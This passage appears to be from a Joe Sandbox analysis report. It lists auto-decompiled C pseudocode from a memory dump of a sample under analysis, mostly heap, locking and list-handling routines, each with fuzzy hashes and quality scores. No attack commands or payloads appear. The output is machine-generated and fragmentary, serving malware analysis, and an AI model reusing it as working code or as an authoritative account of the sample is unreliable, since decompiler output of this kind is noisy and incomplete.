                            								L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                            							}
                            						}
                            						_t29 = _t42;
                            						goto L5;
                            					}
                            					if( *((char*)(_t58 + 0x40)) != 0) {
                            						L10:
                            						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
                            						L0172FFB0(_t41, _t51, 0x1808608);
                            						_t29 = _t58;
                            						goto L5;
                            					}
                            					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                            					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                            						goto L11;
                            					}
                            					goto L10;
                            				}
                            				L1:
                            				_v13 = 0;
                            				_t58 = 0;
                            				goto L2;
                            			}

                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8169ad61bf29660e9f3594b2cc32212b3b7856e0bf3adf404edc524a904e29d2
                            • Instruction ID: 54864301c2c130f77dd401557a0155e17a6f951651201bef5fd2f0b4cf0bcd6b
                            • Opcode Fuzzy Hash: 8169ad61bf29660e9f3594b2cc32212b3b7856e0bf3adf404edc524a904e29d2
                            • Instruction Fuzzy Hash: 343132326053559BD7E2AF18CD88B2BFBA4FFC5B00F010569E82647245EBB0DA80CB85
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 76%
                            			E01719100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
                            				signed int _t53;
                            				signed int _t56;
                            				signed int* _t60;
                            				signed int _t63;
                            				signed int _t66;
                            				signed int _t69;
                            				void* _t70;
                            				intOrPtr* _t72;
                            				void* _t78;
                            				void* _t79;
                            				signed int _t80;
                            				intOrPtr _t82;
                            				void* _t85;
                            				void* _t88;
                            				void* _t89;
                            
                            				_t84 = __esi;
                            				_t70 = __ecx;
                            				_t68 = __ebx;
                            				_push(0x2c);
                            				_push(0x17ef6e8);
                            				E0176D0E8(__ebx, __edi, __esi);
                            				 *((char*)(_t85 - 0x1d)) = 0;
                            				_t82 =  *((intOrPtr*)(_t85 + 8));
                            				if(_t82 == 0) {
                            					L4:
                            					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
                            						E017E88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
                            					}
                            					L5:
                            					return E0176D130(_t68, _t82, _t84);
                            				}
                            				_t88 = _t82 -  *0x18086c0; // 0x14507b0
                            				if(_t88 == 0) {
                            					goto L4;
                            				}
                            				_t89 = _t82 -  *0x18086b8; // 0x0
                            				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                            					goto L4;
                            				} else {
                            					E01732280(_t82 + 0xe0, _t82 + 0xe0);
                            					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
                            					__eflags =  *((char*)(_t82 + 0xe5));
                            					if(__eflags != 0) {
                            						E017E88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
                            						goto L12;
                            					} else {
                            						__eflags =  *((char*)(_t82 + 0xe4));
                            						if( *((char*)(_t82 + 0xe4)) == 0) {
                            							 *((char*)(_t82 + 0xe4)) = 1;
                            							_push(_t82);
                            							_push( *((intOrPtr*)(_t82 + 0x24)));
                            							L0175AFD0();
                            						}
                            						while(1) {
                            							_t60 = _t82 + 8;
                            							 *(_t85 - 0x2c) = _t60;
                            							_t68 =  *_t60;
                            							_t80 = _t60[1];
                            							 *(_t85 - 0x28) = _t68;
                            							 *(_t85 - 0x24) = _t80;
                            							while(1) {
                            								L10:
                            								__eflags = _t80;
                            								if(_t80 == 0) {
                            									break;
                            								}
                            								_t84 = _t68;
                            								 *(_t85 - 0x30) = _t80;
                            								 *(_t85 - 0x24) = _t80 - 1;
                            								asm("lock cmpxchg8b [edi]");
                            								_t68 = _t84;
                            								 *(_t85 - 0x28) = _t68;
                            								 *(_t85 - 0x24) = _t80;
                            								__eflags = _t68 - _t84;
                            								_t82 =  *((intOrPtr*)(_t85 + 8));
                            								if(_t68 != _t84) {
                            									continue;
                            								}
                            								__eflags = _t80 -  *(_t85 - 0x30);
                            								if(_t80 !=  *(_t85 - 0x30)) {
                            									continue;
                            								}
                            								__eflags = _t80;
                            								if(_t80 == 0) {
                            									break;
                            								}
                            								_t63 = 0;
                            								 *(_t85 - 0x34) = 0;
                            								_t84 = 0;
                            								__eflags = 0;
                            								while(1) {
                            									 *(_t85 - 0x3c) = _t84;
                            									__eflags = _t84 - 3;
                            									if(_t84 >= 3) {
                            										break;
                            									}
                            									__eflags = _t63;
                            									if(_t63 != 0) {
                            										L40:
                            										_t84 =  *_t63;
                            										__eflags = _t84;
                            										if(_t84 != 0) {
                            											_t84 =  *(_t84 + 4);
                            											__eflags = _t84;
                            											if(_t84 != 0) {
                            												 *0x180b1e0(_t63, _t82);
                            												 *_t84();
                            											}
                            										}
                            										do {
                            											_t60 = _t82 + 8;
                            											 *(_t85 - 0x2c) = _t60;
                            											_t68 =  *_t60;
                            											_t80 = _t60[1];
                            											 *(_t85 - 0x28) = _t68;
                            											 *(_t85 - 0x24) = _t80;
                            											goto L10;
                            										} while (_t63 == 0);
                            										goto L40;
                            									}
                            									_t69 = 0;
                            									__eflags = 0;
                            									while(1) {
                            										 *(_t85 - 0x38) = _t69;
                            										__eflags = _t69 -  *0x18084c0;
                            										if(_t69 >=  *0x18084c0) {
                            											break;
                            										}
                            										__eflags = _t63;
                            										if(_t63 != 0) {
                            											break;
                            										}
                            										_t66 = E017E9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
                            										__eflags = _t66;
                            										if(_t66 == 0) {
                            											_t63 = 0;
                            											__eflags = 0;
                            										} else {
                            											_t63 = _t66 + 0xfffffff4;
                            										}
                            										 *(_t85 - 0x34) = _t63;
                            										_t69 = _t69 + 1;
                            									}
                            									_t84 = _t84 + 1;
                            								}
                            								__eflags = _t63;
                            							}
                            							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
                            							 *((char*)(_t82 + 0xe5)) = 1;
                            							 *((char*)(_t85 - 0x1d)) = 1;
                            							L12:
                            							 *(_t85 - 4) = 0xfffffffe;
                            							E0171922A(_t82);
                            							_t53 = E01737D50();
                            							__eflags = _t53;
                            							if(_t53 != 0) {
                            								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                            							} else {
                            								_t56 = 0x7ffe0386;
                            							}
                            							__eflags =  *_t56;
                            							if( *_t56 != 0) {
                            								_t56 = E017E8B58(_t82);
                            							}
                            							__eflags =  *((char*)(_t85 - 0x1d));
                            							if( *((char*)(_t85 - 0x1d)) != 0) {
                            								__eflags = _t82 -  *0x18086c0; // 0x14507b0
                            								if(__eflags != 0) {
                            									__eflags = _t82 -  *0x18086b8; // 0x0
                            									if(__eflags == 0) {
                            										_t79 = 0x18086bc;
                            										_t72 = 0x18086b8;
                            										goto L18;
                            									}
                            									__eflags = _t56 | 0xffffffff;
                            									asm("lock xadd [edi], eax");
                            									if(__eflags == 0) {
                            										E01719240(_t68, _t82, _t82, _t84, __eflags);
                            									}
                            								} else {
                            									_t79 = 0x18086c4;
                            									_t72 = 0x18086c0;
                            									L18:
                            									E01749B82(_t68, _t72, _t79, _t82, _t84, __eflags);
                            								}
                            							}
                            							goto L5;
                            						}
                            					}
                            				}
                            			}

                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bfb18048ea645f9607c3d48136469b00e515a6da034528ee0e75f67700fd2db9
                            • Instruction ID: 2df3aaafd1d3dd3769848b4b3641bb9ab08ca889f9ab783880fef5904a49b2d3
                            • Opcode Fuzzy Hash: bfb18048ea645f9607c3d48136469b00e515a6da034528ee0e75f67700fd2db9
                            • Instruction Fuzzy Hash: 0431D471A01245DFDB26DB6CC49C7ACFBF1BB49318F15815DC61467249C330AAC1DB52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 53%
                            			E01730050(void* __ecx) {
                            				signed int _v8;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				void* __ebp;
                            				intOrPtr* _t30;
                            				intOrPtr* _t31;
                            				signed int _t34;
                            				void* _t40;
                            				void* _t41;
                            				signed int _t44;
                            				intOrPtr _t47;
                            				signed int _t58;
                            				void* _t59;
                            				void* _t61;
                            				void* _t62;
                            				signed int _t64;
                            
                            				_push(__ecx);
                            				_v8 =  *0x180d360 ^ _t64;
                            				_t61 = __ecx;
                            				_t2 = _t61 + 0x20; // 0x20
                            				L01749ED0(_t2, 1, 0);
                            				_t52 =  *(_t61 + 0x8c);
                            				_t4 = _t61 + 0x8c; // 0x8c
                            				_t40 = _t4;
                            				do {
                            					_t44 = _t52;
                            					_t58 = _t52 & 0x00000001;
                            					_t24 = _t44;
                            					asm("lock cmpxchg [ebx], edx");
                            					_t52 = _t44;
                            				} while (_t52 != _t44);
                            				if(_t58 == 0) {
                            					L7:
                            					_pop(_t59);
                            					_pop(_t62);
                            					_pop(_t41);
                            					return L0175B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
                            				}
                            				asm("lock xadd [esi], eax");
                            				_t47 =  *[fs:0x18];
                            				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
                            				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
                            				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                            				if(_t30 != 0) {
                            					if( *_t30 == 0) {
                            						goto L4;
                            					}
                            					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                            					L5:
                            					if( *_t31 != 0) {
                            						_t18 = _t61 + 0x78; // 0x78
                            						E017E8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
                            					}
                            					_t52 =  *(_t61 + 0x5c);
                            					_t11 = _t61 + 0x78; // 0x78
                            					_t34 = L01749702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
                            					_t24 = _t34 | 0xffffffff;
                            					asm("lock xadd [esi], eax");
                            					if((_t34 | 0xffffffff) == 0) {
                            						 *0x180b1e0(_t61);
                            						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
                            					}
                            					goto L7;
                            				}
                            				L4:
                            				_t31 = 0x7ffe0386;
                            				goto L5;
                            			}

                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0d8ac152fdcac471f4ad97ecbec75fe9c93cfcaff3d27ff0fb9938afbeec0a9e
                            • Instruction ID: cfe2f09851476919e254b5ae3402e6628c35c782b104d2b3b2996b83b3c42d79
                            • Opcode Fuzzy Hash: 0d8ac152fdcac471f4ad97ecbec75fe9c93cfcaff3d27ff0fb9938afbeec0a9e
                            • Instruction Fuzzy Hash: C431CE31201B05CFD722CF28C984B9AF3E5FF89714F1445ADE59687B91EB71A801CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 82%
                            			E017590AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
                            				intOrPtr* _v0;
                            				void* _v8;
                            				signed int _v12;
                            				intOrPtr _v16;
                            				char _v36;
                            				void* _t38;
                            				intOrPtr _t41;
                            				void* _t44;
                            				signed int _t45;
                            				intOrPtr* _t49;
                            				signed int _t57;
                            				signed int _t58;
                            				intOrPtr* _t59;
                            				void* _t62;
                            				void* _t63;
                            				void* _t65;
                            				void* _t66;
                            				signed int _t69;
                            				intOrPtr* _t70;
                            				void* _t71;
                            				intOrPtr* _t72;
                            				intOrPtr* _t73;
                            				char _t74;
                            
                            				_t65 = __edx;
                            				_t57 = _a4;
                            				_t32 = __ecx;
                            				_v8 = __edx;
                            				_t3 = _t32 + 0x14c; // 0x14c
                            				_t70 = _t3;
                            				_v16 = __ecx;
                            				_t72 =  *_t70;
                            				while(_t72 != _t70) {
                            					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
                            						L24:
                            						_t72 =  *_t72;
                            						continue;
                            					}
                            					_t30 = _t72 + 0x10; // 0x10
                            					if(L0176D4F0(_t30, _t65, _t57) == _t57) {
                            						return 0xb7;
                            					}
                            					_t65 = _v8;
                            					goto L24;
                            				}
                            				_t61 = _t57;
                            				_push( &_v12);
                            				_t66 = 0x10;
                            				if(E0174E5E0(_t57, _t66) < 0) {
                            					return 0x216;
                            				}
                            				_t73 = L01734620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
                            				if(_t73 == 0) {
                            					_t38 = 0xe;
                            					return _t38;
                            				}
                            				_t9 = _t73 + 0x10; // 0x10
                            				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
                            				E0175F3E0(_t9, _v8, _t57);
                            				_t41 =  *_t70;
                            				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
                            					_t62 = 3;
                            					asm("int 0x29");
                            					_push(_t62);
                            					_push(_t57);
                            					_push(_t73);
                            					_push(_t70);
                            					_t71 = _t62;
                            					_t74 = 0;
                            					_v36 = 0;
                            					_t63 = E0174A2F0(_t62, _t71, 1, 6,  &_v36);
                            					if(_t63 == 0) {
                            						L20:
                            						_t44 = 0x57;
                            						return _t44;
                            					}
                            					_t45 = _v12;
                            					_t58 = 0x1c;
                            					if(_t45 < _t58) {
                            						goto L20;
                            					}
                            					_t69 = _t45 / _t58;
                            					if(_t69 == 0) {
                            						L19:
                            						return 0xe8;
                            					}
                            					_t59 = _v0;
                            					do {
                            						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
                            							goto L18;
                            						}
                            						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
                            						 *_t59 = _t49;
                            						if( *_t49 != 0x53445352) {
                            							goto L18;
                            						}
                            						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
                            						return 0;
                            						L18:
                            						_t63 = _t63 + 0x1c;
                            						_t74 = _t74 + 1;
                            					} while (_t74 < _t69);
                            					goto L19;
                            				}
                            				 *_t73 = _t41;
                            				 *((intOrPtr*)(_t73 + 4)) = _t70;
                            				 *((intOrPtr*)(_t41 + 4)) = _t73;
                            				 *_t70 = _t73;
                            				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
                            				return 0;
                            			}

                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                            • Instruction ID: 66e0de30b2400b3bdbdb2b4d62e8f13cd8c0bd75c6e3e6d0816c80db469c8136
                            • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                            • Instruction Fuzzy Hash: 6D219271A00219EFDB21DF59C844EAAFBF8EB54314F1488AEEE49A7211D370ED14CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 59%
                            			E01743B7A(void* __ecx) {
                            				signed int _v8;
                            				char _v12;
                            				intOrPtr _v20;
                            				intOrPtr _t17;
                            				intOrPtr _t26;
                            				void* _t35;
                            				void* _t38;
                            				void* _t41;
                            				intOrPtr _t44;
                            
                            				_t17 =  *0x18084c4; // 0x0
                            				_v12 = 1;
                            				_v8 =  *0x18084c0 * 0x4c;
                            				_t41 = __ecx;
                            				_t35 = L01734620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x18084c0 * 0x4c);
                            				if(_t35 == 0) {
                            					_t44 = 0xc0000017;
                            				} else {
                            					_push( &_v8);
                            					_push(_v8);
                            					_push(_t35);
                            					_push(4);
                            					_push( &_v12);
                            					_push(0x6b);
                            					_t44 = E0175AA90();
                            					_v20 = _t44;
                            					if(_t44 >= 0) {
                            						E0175FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x18084c0 * 0xc);
                            						_t38 = _t35;
                            						if(_t35 < _v8 + _t35) {
                            							do {
                            								asm("movsd");
                            								asm("movsd");
                            								asm("movsd");
                            								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
                            							} while (_t38 < _v8 + _t35);
                            							_t44 = _v20;
                            						}
                            					}
                            					_t26 =  *0x18084c4; // 0x0
                            					L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
                            				}
                            				return _t44;
                            			}

                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 754462f246bb53273792e32cd9358c77a8617db436fbb3c8745624ab53bbd978
                            • Instruction ID: 5ca87c7417fcf68f3c557b294ebbd68671155b4325f76cfee0a6909590646a73
                            • Opcode Fuzzy Hash: 754462f246bb53273792e32cd9358c77a8617db436fbb3c8745624ab53bbd978
                            • Instruction Fuzzy Hash: 3D21BE72A00519EFCB15DF58CD81F5ABBBDFB40308F1500A8EA08AB252D371AE41CB94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 54%
                            			E0174B390(void* __ecx, intOrPtr _a4) {
                            				signed int _v8;
                            				signed char _t12;
                            				signed int _t16;
                            				signed int _t21;
                            				void* _t28;
                            				signed int _t30;
                            				signed int _t36;
                            				signed int _t41;
                            
                            				_push(__ecx);
                            				_t41 = _a4 + 0xffffffb8;
                            				E01732280(_t12, 0x1808608);
                            				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
                            				asm("sbb edi, edi");
                            				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
                            				_v8 = _t36;
                            				asm("lock cmpxchg [ebx], ecx");
                            				_t30 = 1;
                            				if(1 != 1) {
                            					while(1) {
                            						_t21 = _t30 & 0x00000006;
                            						_t16 = _t30;
                            						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
                            						asm("lock cmpxchg [edi], esi");
                            						if(_t16 == _t30) {
                            							break;
                            						}
                            						_t30 = _t16;
                            					}
                            					_t36 = _v8;
                            					if(_t21 == 2) {
                            						_t16 = E017500C2(0x1808608, 0, _t28);
                            					}
                            				}
                            				if(_t36 != 0) {
                            					_t16 = L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
                            				}
                            				return _t16;
                            			}

                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d4aedbf97f779f737c2751a022b791d2a0f142b10ad7f16c547765d7e7b94ff6
                            • Instruction ID: 660073701d490ccd72da395941d0d30c1709e8874b2e5f209357ac0650b27be9
                            • Opcode Fuzzy Hash: d4aedbf97f779f737c2751a022b791d2a0f142b10ad7f16c547765d7e7b94ff6
                            • Instruction Fuzzy Hash: 10116B337051149BCB1A9A198D81A2BF36AEBD5730B250139EE26C7780CA319C02C690
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 77%
                            			E01719240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                            				intOrPtr _t33;
                            				intOrPtr _t37;
                            				intOrPtr _t41;
                            				intOrPtr* _t46;
                            				void* _t48;
                            				intOrPtr _t50;
                            				intOrPtr* _t60;
                            				void* _t61;
                            				intOrPtr _t62;
                            				intOrPtr _t65;
                            				void* _t66;
                            				void* _t68;
                            
                            				_push(0xc);
                            				_push(0x17ef708);
                            				E0176D08C(__ebx, __edi, __esi);
                            				_t65 = __ecx;
                            				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
                            				if( *(__ecx + 0x24) != 0) {
                            					_push( *(__ecx + 0x24));
                            					E017595D0();
                            					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
                            				}
                            				L6();
                            				L6();
                            				_push( *((intOrPtr*)(_t65 + 0x28)));
                            				E017595D0();
                            				_t33 =  *0x18084c4; // 0x0
                            				L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
                            				_t37 =  *0x18084c4; // 0x0
                            				L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
                            				_t41 =  *0x18084c4; // 0x0
                            				E01732280(L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x18086b4);
                            				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
                            				_t46 = _t65 + 0xe8;
                            				_t62 =  *_t46;
                            				_t60 =  *((intOrPtr*)(_t46 + 4));
                            				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
                            					_t61 = 3;
                            					asm("int 0x29");
                            					_push(_t65);
                            					_t66 = _t61;
                            					_t23 = _t66 + 0x14; // 0x8df8084c
                            					_push( *_t23);
                            					E017595D0();
                            					_t24 = _t66 + 0x10; // 0x89e04d8b
                            					_push( *_t24);
                            					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
                            					_t48 = E017595D0();
                            					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
                            					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
                            					return _t48;
                            				} else {
                            					 *_t60 = _t62;
                            					 *((intOrPtr*)(_t62 + 4)) = _t60;
                            					 *(_t68 - 4) = 0xfffffffe;
                            					E01719325();
                            					_t50 =  *0x18084c4; // 0x0
                            					return E0176D0D1(L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
                            				}
                            			}

                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID: InitializeThunk
                            • String ID:
                            • API String ID: 2994545307-0
                            • Opcode ID: 8a33109274e40d33f1c9d457cfb6c38043c6e4dfececbcddd3411d4acfc86cd2
                            • Instruction ID: 672b53f870216a18abf02bc185e75a01f8cb5af276eebe8c7ce529f9a8fe5e8a
                            • Opcode Fuzzy Hash: 8a33109274e40d33f1c9d457cfb6c38043c6e4dfececbcddd3411d4acfc86cd2
                            • Instruction Fuzzy Hash: 68218971041A01DFC7A2EF28CA54F19F7F9FF18308F11456CE149866AACB34EA82CB44
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 90%
                            			E017A4257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
                            				intOrPtr* _t18;
                            				intOrPtr _t24;
                            				intOrPtr* _t27;
                            				intOrPtr* _t30;
                            				intOrPtr* _t31;
                            				intOrPtr _t33;
                            				intOrPtr* _t34;
                            				intOrPtr* _t35;
                            				void* _t37;
                            				void* _t38;
                            				void* _t39;
                            				void* _t43;
                            
                            				_t39 = __eflags;
                            				_t35 = __edi;
                            				_push(8);
                            				_push(0x17f08d0);
                            				E0176D08C(__ebx, __edi, __esi);
                            				_t37 = __ecx;
                            				E017A41E8(__ebx, __edi, __ecx, _t39);
                            				L0172EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                            				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
                            				_t18 = _t37 + 8;
                            				_t33 =  *_t18;
                            				_t27 =  *((intOrPtr*)(_t18 + 4));
                            				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
                            					L8:
                            					_push(3);
                            					asm("int 0x29");
                            				} else {
                            					 *_t27 = _t33;
                            					 *((intOrPtr*)(_t33 + 4)) = _t27;
                            					_t35 = 0x18087e4;
                            					_t18 =  *0x18087e0; // 0x0
                            					while(_t18 != 0) {
                            						_t43 = _t18 -  *0x1805cd0; // 0xffffffff
                            						if(_t43 >= 0) {
                            							_t31 =  *0x18087e4; // 0x0
                            							_t18 =  *_t31;
                            							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
                            								goto L8;
                            							} else {
                            								 *0x18087e4 = _t18;
                            								 *((intOrPtr*)(_t18 + 4)) = _t35;
                            								L01717055(_t31 + 0xfffffff8);
                            								_t24 =  *0x18087e0; // 0x0
                            								_t18 = _t24 - 1;
                            								 *0x18087e0 = _t18;
                            								continue;
                            							}
                            						}
                            						goto L9;
                            					}
                            				}
                            				L9:
                            				__eflags =  *0x1805cd0;
                            				if( *0x1805cd0 <= 0) {
                            					L01717055(_t37);
                            				} else {
                            					_t30 = _t37 + 8;
                            					_t34 =  *0x18087e8; // 0x0
                            					__eflags =  *_t34 - _t35;
                            					if( *_t34 != _t35) {
                            						goto L8;
                            					} else {
                            						 *_t30 = _t35;
                            						 *((intOrPtr*)(_t30 + 4)) = _t34;
                            						 *_t34 = _t30;
                            						 *0x18087e8 = _t30;
                            						 *0x18087e0 = _t18 + 1;
                            					}
                            				}
                            				 *(_t38 - 4) = 0xfffffffe;
                            				return E0176D0D1(L017A4320());
                            			}

                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8c3f5cf126e3ff09bd07f55c7b9f0aa9f9df8fb442813ee3d9ffae3270113d84
                            • Instruction ID: 6d118d2b07e77f09ac1828103b8da147b0aae42b196ec3bbfd5e990344f7d00f
                            • Opcode Fuzzy Hash: 8c3f5cf126e3ff09bd07f55c7b9f0aa9f9df8fb442813ee3d9ffae3270113d84
                            • Instruction Fuzzy Hash: 63215B71901605CFCB66DF68D004614FBB1FBDA314BA883AEC1068B29DDBB29691CF01
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 34%
                            			E01742397(intOrPtr _a4) {
                            				void* __ebx;
                            				void* __ecx;
                            				void* __edi;
                            				void* __esi;
                            				void* __ebp;
                            				signed int _t11;
                            				void* _t19;
                            				void* _t25;
                            				void* _t26;
                            				intOrPtr _t27;
                            				void* _t28;
                            				void* _t29;
                            
                            				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
                            				if( *0x180848c != 0) {
                            					L0173FAD0(0x1808610);
                            					if( *0x180848c == 0) {
                            						E0173FA00(0x1808610, _t19, _t27, 0x1808610);
                            						goto L1;
                            					} else {
                            						_push(0);
                            						_push(_a4);
                            						_t26 = 4;
                            						_t29 = L01742581(0x1808610, 0x16f50a0, _t26, _t27, _t28);
                            						E0173FA00(0x1808610, 0x16f50a0, _t27, 0x1808610);
                            					}
                            				} else {
                            					L1:
                            					_t11 =  *0x1808614; // 0x0
                            					if(_t11 == 0) {
                            						_t11 = E01754886(0x16f1088, 1, 0x1808614);
                            					}
                            					_push(0);
                            					_push(_a4);
                            					_t25 = 4;
                            					_t29 = L01742581(0x1808610, (_t11 << 4) + 0x16f5070, _t25, _t27, _t28);
                            				}
                            				if(_t29 != 0) {
                            					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
                            					 *((char*)(_t29 + 0x40)) = 0;
                            				}
                            				return _t29;
                            			}
















                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: eb3ba14d24b64387436603abe9276bd21e503bc3adb04973f6d605e5b4a9bab0
                            • Instruction ID: 242b0e71309f3a7454f4daa75e41a67849166efca33a2d0f345285ed2cc7b2a5
                            • Opcode Fuzzy Hash: eb3ba14d24b64387436603abe9276bd21e503bc3adb04973f6d605e5b4a9bab0
